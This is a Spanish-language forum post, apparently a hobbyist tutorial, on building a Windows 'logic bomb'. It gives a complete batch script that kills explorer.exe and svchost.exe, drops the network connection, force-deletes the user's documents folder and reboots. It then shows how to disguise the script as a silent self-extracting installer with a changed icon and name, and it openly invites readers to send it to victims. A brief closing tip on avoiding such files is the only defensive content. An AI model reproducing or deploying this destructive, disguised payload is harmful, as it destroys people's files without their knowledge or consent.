Bueno chicos, hace rato, bastante tiempo vengo experimentando con bombas lógicas. Para lo que no sepan que es, puede llamarse a un programa, o archivo, un .exe el cual está programado para "X" acción en "X" tiempo en "X" sistema opertivo y en "X" usuario.
Cada bomba lógica, es programable por su creador, es decir vos podés programar cuando querés que se active como :
-La ejecucion de un programa
-Abrir un archivo
-Determinada fecha y hora
-O simplemente al hacerle doble click
Estás bombas suelen ser disfrazadas para que parezcan archivos normales o instalaciones, como dice al principio.
Una forma de hacerlo, sencillamente es con un bloc de notas, si esa aplicación que ya viene en todos los windows.
Tras un par de comandos de msdos podés programar esta bomba para hacer lo que vos quieras.
¿Algo que ver con el hacking?
No, para mi no. El hacking es algo mas avanzado diría yo, esto podría usarse por un "lammer" pare decir "mira, formatié esta pc desde mi casa". No tiene nada que ver con trabajar en redes, ni es conexiones ni tenés que tener nada de conocimiento, con un par de comandos que te sepas listo. Es más podría yo tranquilamente hacer un par y subirlas a algún host de descargas así udstedes lo tienen y se lo mandan a quien quieren y listo, basta con armarse un poco de ingenio y vivesa. En fin, no tiene nada que ver al hacking.
¿Como crear una bomba?
Una manera fácil de crear una de estos mounstritos es a través del bloc de notas como dice bien arriba.
El primer paso, ya teniendo abierto el bloc de notas es tipiar lo siguiente:
@hecho off
Esto se pone al principio de toda bomba lógica.
El paso siguiente, para borrar y dejar requerimientos libres en la pc (cosa que ami me parece mas cómodo) es cerrar todos los programas abiertos y que se están ejecutando. Esto aligera el proceso e impide a la víctima en pensar que hacer según los programas que cerrés. En mi caso por ejemplo cerraría el explorer.exe y svchost.exe [El comando para cerrar programas es "tasskkill /f /im "nombre"]
Entonces quedaría así:
@echo off
taskkill /f /im explorer.exe
taskkill /f /im svchost.exe
El paso siguiente es desconectarse de internet, otra manera de liberar recursos y acelerar el proceso. Para es ponemos ipconfig /release (desconecta la IP de todos los servidores)
@echo off
taskkill /f /im explorer.exe
taskkill /f /im svchost.exe
ipconfig /release
Acá ya tenemos la base, vemos como se desconecta de internet, como cierra el explorer y el svchost. Estos dos programas que se cierran deja sin función a la persona que manipula la PC "infectada". Ya que por lo menos le das click a la cruz y listo, ¿no?. Para evitar eso seguí leyendo abajo.
El objetivo de esta bomba, será borrar todos los documentos, no es destructiva pero realmente un dolor de huevos, mas si tenés fotos viejas, lindos recuerdos, documentos importantes, cosas de la facu, del colegio o del laburo. Realmente un garrón.
Para borrar carpetas o archivos debemos poner el comando de eliminar, y a continuación el nombre de la carpeta, en caso que sea un archivo, la ruta de donde proviene el mismo. [El comando pare eliminar es del /s /f /q "carpeta o archivo"]
Quedaría así:
@echo off
ipconfig /release
taskkill /f /im explorer.exe
taskkill /f /im svchost.exe
del /s /f /q "Cocuments and Settings"
Para completar la fase, pondré que se reinicie la PC. Entonces agregamos "shutdown -r -f -t 01" (para ver mas comandos de shutdown, tipiar en "cmd" "shutdown" y presionar ENTER)
Y al terminar, escribimos "exit" para terminar la bomba.
El final sería así:
@echo off
ipconfig /release
taskkill /f /im explorer.exe
taskkill /f /im svchost.exe
del /s /f /q "Cocuments and Settings"
shutdown -r -f -t 01
exit
Bueno, ya tenemos la base completada, tenemos que hará la bomba al ejecutarse... pero como se ejecuta si es un bloc de notas, en todo caso cuando lo ejecutemos se abrirá el bloc con las lineas que escribimos antes... no hace nada en la pc....
Por eso debemos guardarlo en .bat. Una vez escrito todo, van a archivo, guardar como y le ponen por ejemplo "bomba.bat" y lo guardan
Ahora, es hora de disfrazarlo porque no creo que nadie se anime a abrir un archivo desconocido con un icono raro y un nombre con extencion .bat (WTF!)
HACIENDO A LA BOMBA UN .EXE
Para ser mas creible, se puede hacer un .exe con la bomba. Es decir, hacerle doble click, que parezca una instalacion normal y al finalizar no pasa nada. Al reiniciarse el computador se comenzará a ejecutar la bomba.
El primer paso, necesitan el winRar
Hacen click derecho al archivo .bat que hicieron tiempito antes y le dan a "añadir al archivo" que al lado esta el icono del winrar y les abrirá una ventana con opciones para añadir el archivo a un .rar
Nosotros queremos .exe, asi que al costado de la derecha tildamos la opcion que dice "crear archivo auto-extraible".
Verán como el nombre cambia a bomba.exe al tildar esa opción.
Como queremos que esta acción sea oculta y no se vea ningun proceso, vamos a ponerlo oculto.
Go pestañas "avanzado" y entran a la opcion "autoextraible". Les abre otra ventana aparte, buscan la pestaña "MODO" y tildan donde dice "ocultar todo".
En la pestaña "texto e icono" pueden personalizar y cubrir el archivo para ponerle otro icono desde ahí o cambiarle el nombre. (opcional)
Al terminar le dan click a "ACEPTAR" y listo, nuestra bomba esta completa.
Lo que hará:
Al ejecutarse no pasará nada, al reiniciarse la computadora, sin llegar a abrir el explorer ni nada abrirá una ventana de ms-dos, se desconectará de internet y borrará todos los documentos y archivos que estén en "mis documentos". No puede cancelarse.
COMO EVITAR ATAQUES DE BOMBAS
Es realmente mas fácil de lo que piensan, cuando ven un "portable" muy tentador, nunca lo bajen si tener comentarios a favor antes. Esto les ahorrará bronca, tiempo y archivos
Espero que les haya servido.
Saludos!
Si tenés mas ganás de saber sobre
computadoras, conexiones y cursos a
vanzados de hacking, NO DUDES EN SEGUIRME
y RECOMENDAR MIS POSTS!